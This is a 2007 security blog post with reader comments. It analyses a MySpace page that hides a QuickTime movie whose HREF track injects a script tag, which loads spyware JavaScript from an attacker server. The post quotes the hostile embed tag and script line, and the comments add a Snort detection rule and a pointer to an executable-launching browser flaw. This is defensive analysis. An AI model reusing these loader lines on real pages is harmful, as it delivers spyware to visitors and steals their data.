Here’s an interesting infection vector, used by a new malware: it’s a QuickTime movie!
McAfee VirusScan detects the malware as JS/SpaceTalk Trojan. The description for this malware is empty, your guess of the characteristics of this malware is as good mine.
Interested in the details? Read on!
This Myspace page (of a French rockband) has an embedded QuickTime movie. Here’s the EMBED HTML tag in the source (I changed the formatting to make it more readable):
<embed enableJavascript="false" allowScriptAccess="never" allownetworking="internal" src=http://profileawareness.com/tys4.mov hidden=true />
The EMBED tag instructs your browser to play a movie when it renders the HTML page. But in this case, the movie is hidden (attribute hidden is true). It’s a QuickTime movie, downloaded from the profileawareness.com server.
This tys4.mov QuickTime movie is sneaky: it contains JavaScript code to download and execute another JavaScript program. QuickTime has a feature that allows you to embed URLs or JavaScript in a movie. Apple calls this feature HREF tracks. From the Apple site:
An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that load QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.
An HREF track is not meant to be displayed; it simply contains link information. The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.
The syntax for an HREF track is simple, here’s an example that automatically loads the page http://www.google.com 1 minute into the movie:
[00:01:00.00] A<http://www.google.com> T<frame>
Let’s take a look inside the tys4.mov QuickTime movie. First we use the strings command to dump all strings contained in this QuickTime file.
strings tys4.mov
Here is what we see at the end of the dump:
Do you recognize the syntax at the end: A<javascript> T<>
It will automatically execute a JavaScript script when the movie is played (since there is no timestamp, the script executes immediately).
The script is simple: it creates a script tag and adds it to the HTML page, thereby downloading and executing a new script from the profileawareness server:
<script src=’http://profileawareness.com/logs4/sqltrack.js‘/>
It’s this script that is detected by McAfee (at the moment of writing, McAfee was the only antivirus on VirusTotal to detect this script).
The QuickTime fileformat is a binary, hierarchical stream of atoms.
Qtatomizer is a tool to display this hierarchy of atoms.
The QuickTime movie is what is known as a Downloader, but AV programs do not detect it.
The downloaded script is just Spyware, it will collect data about the Myspace user viewing the page and upload it to the profileawareness server.
To summarize the actions:
• You visit a website
• It plays a hidden QuickTime movie
• The QuickTime movie automatically downloads a JavaScript program
• The JavaScript program is executed
*shakes a fist at QuickTime trying to do too much*
Nice analysis, Didier! I always like reading your posts like this, as they are easy to follow and give a really good example/tutorial for those of us who’ve not done something like this before.
Comment by LonerVamp — Monday 12 March 2007 @ 13:40
Wow, good job! I never suspected that Quicktime movies could be used as an attack vector. Oh my, think about how effective this could be if the sites peddling free pr0n samples would start using this technique.
Btw, I’m pretty sure the technical term here should be “Pwnt” or “Pwned”. This is the first time I saw someone spell it “P0wned”. 😉
Comment by Luke — Monday 12 March 2007 @ 14:07
Thanks.
About P0wned: I was inspired by Harlan’s post “P0wned by certs” (http://windowsir.blogspot.com/2007/01/p0wned-by-certs.html)
Comment by Didier Stevens — Monday 12 March 2007 @ 14:15
[…] you know that you can embed JS scripts in Apple Quicktime movies? (the feature is called “HREF tracks”) An HREF track is a special type of text track […]
Pingback by QuickTime movies as malware infection vector at Security Samizdat — Monday 12 March 2007 @ 15:11
nice analysis, QuickTime has a few other issues similar to this one. You can read about them here:
http://www.gnucitizen.org/blog/backdooring-quicktime-movies/
http://www.gnucitizen.org/blog/backdooring-mp3-files/
Comment by pdp — Monday 12 March 2007 @ 17:36
[…] Here’s a link to the blog entry: https://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/ […]
Pingback by average admins » Blog Archive » P0wned by a QT movie — Monday 12 March 2007 @ 21:07
This exploit vector should have been taken care of with the Quicktime 7.1.5 update (dating March 6th).
http://developer.apple.com/documentation/QuickTime/Conceptual/QTScripting_JavaScript/bQTScripting_JavaScri_Document/chapter_1000_section_4.html
As your article was published March 12th I’m surprised that you did not include any information about this update.
Regards,
Joachim
Comment by Joachim Buechse — Friday 16 March 2007 @ 11:30
Thanks Didier, good info.
Symantec now sees the Javascript sqltrack.js as Infostealer.
Steve
Comment by Steve — Friday 16 March 2007 @ 11:48
Anyone think of a little ‘poison the well’ approach with the javascript? IE, sending a bunch of crap to fill their tracking server… I know I’ve thought of it.
Comment by bongo mcginty — Friday 16 March 2007 @ 13:02
Hello,
Does anyone know if this vulnerability was patched with the update that Apple released last week? Specifically, I’m thinking of:
CVE-ID: CVE-2006-4965, CVE-2007-0059
Available for: Mac OS X v10.3.9 and later, Windows Vista/XP/2000
Impact: Viewing a maliciously-crafted QuickTime movie file or QTL file may lead to arbitrary JavaScript code execution in context of the local domain
Description: A cross-zone scripting issue exists in QuickTime’s browser plugin. By enticing a user to open a malicious QuickTime movie file or QTL file, an attacker can trigger the issue, which may lead to arbitrary JavaScript code execution in context of the local domain. This issue has been described on the Month of Apple Bugs web site (MOAB-03-01-2007). This update addresses the issue by performing additional validation of QuickTime movie files and QTL files.
http://docs.info.apple.com/article.html?artnum=305149
Comment by Dan Goodin — Friday 16 March 2007 @ 14:03
This is the same old problem as ‘doze media player has been suffering from for years: they call them ‘url flips’. See, e.g.
http://marc.theaimsgroup.com/?l=bugtraq&m=101447771102582&w=2
http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0112.html
for a couple of malicious uses.
Comment by DaveK — Friday 16 March 2007 @ 16:39
[…] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from […]
Pingback by Computer Security Research - McAfee Avert Labs Blog — Friday 16 March 2007 @ 17:24
Apple fixed a similar issue in 7.1.5. Check http://docs.info.apple.com/article.html?artnum=305149
and search for scripting.
Are you using 7.1.5? If so, did you actually see any script execution, or are you just going by the McAfee alert?
Comment by Anonymous — Saturday 17 March 2007 @ 4:31
Could a java script run an executable through the Apple Quicktime flaw? Just a asking because I have been infected by malware and I think this could be the tehnique. And a little example if this can be done. Thank you in advance.
Comment by priv8 — Saturday 17 March 2007 @ 12:43
MySpace hat einen Quicktime Exploit
Wie vor fast einer Woche schon entdeckt gibt es auf MySpace ein Exploit in .mov Filmem ( z.B. beim Besuch der band Mamasaid.. beim öffnen dieser wird ein Script im Hintergrund ausgeführt.
“Das Script ermittelt den Myspace-Benutzernamen des Be…
Trackback by grafikworkX - the design factory — Sunday 18 March 2007 @ 5:29
[…] that acts as the spyware, according to the researcher, Didier Stevens, who documents his findings here.http://www.theregister.com/2007/03/16/myspace_quicktime_exploit/ Share this post: email it! | […]
Pingback by DP's Security Bits : MySpace-hosted malware exploits QuickTime flaw — Sunday 18 March 2007 @ 8:30
@Joachim
> As your article was published March 12th I’m surprised that you did not include any information about this update.
The explanation is very simple: I discovered this and wrote the article before Apple published a fix, and I was not aware that Apple had released a fix for this when I published the article. I don’t use QT, it’s not installed on my systems.
Comment by Didier Stevens — Sunday 18 March 2007 @ 13:42
@priv8
Yes, the JavaScript could exploit a browser vulnerability to execute an executable in the user’s security context.
Comment by Didier Stevens — Sunday 18 March 2007 @ 13:51
Can you go into more detail on the last comment? What type of browser vulnerability would need to exist to execute an executable from Javascript?
Comment by Anonymous — Sunday 18 March 2007 @ 17:11
[…] version (7.1.5) without support for JavaScript. This happened about a week before I posted “P0wned by a QT movie”. I had analyzed the infection and written (but not published) my post before Apple published the […]
Pingback by Update: P0wned by a QT movie « Didier Stevens — Sunday 18 March 2007 @ 19:14
@Anonymous
ADODB.Stream for example, http://www.f-secure.com/v-descs/adodb_stream.shtml
Comment by Didier Stevens — Monday 19 March 2007 @ 11:36
[…] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from […]
Pingback by Chris Mosby at myITforum.com : McAfee Avert Labs Blog - MySpace Woes: Trojan Targets French Rock Band Fans - Friday March 16, 2007 — Monday 19 March 2007 @ 16:14
Posted a Snort sig to BleedingThreats.net.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”BLEEDING-EDGE CURRENT EVENTS SpaceTalk-QT-js”; flow:to_server,established; uricontent:”/logs4/sqltrack.js”; nocase; classtype:trojan-activity; reference:url,didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/; sid:2003507; rev:1;)
Comment by Russ McRee — Monday 19 March 2007 @ 17:57
[…] to execute scriptable content in the context of the current website. Didier Stevens has a nice write up of the particular exploit. Though it appears patched with the latest version of Quicktime it […]
Pingback by :: Binary Paradox :: » Blog Archive » A Eulogy for Flatfiles — Monday 19 March 2007 @ 18:02
I am protected by McAfe…but have this trojan I suspect…is it possible that somehow this malware or whatever can disable my virus protection? There have been a few occasions when I have found my protection disabled, yet I hadn’t disabled it.
Elizabeth
Comment by Elizabeth m Maloney — Wednesday 28 March 2007 @ 1:57
Yes, a lot of malware programs can disable security software, like AV. However, most of them can only do this when you run as local admin.
Comment by Didier Stevens — Sunday 1 April 2007 @ 18:49
their own personal space at last
Yeah!. Congratulations for the blog
Your post is very interesting .In your blog are a lot of good post..
I’ll bookmark you.
A462fc6cb9bbeb
Trackback by me 4you — Wednesday 25 April 2007 @ 21:23
Peace people
We love you
Comment by HelloWorld — Saturday 28 April 2007 @ 11:48
I think I’ve read something simillar a few days ago. I don’t remember where, might have been on digg.com or slashdot.
Comment by kevstelo — Monday 11 June 2007 @ 7:30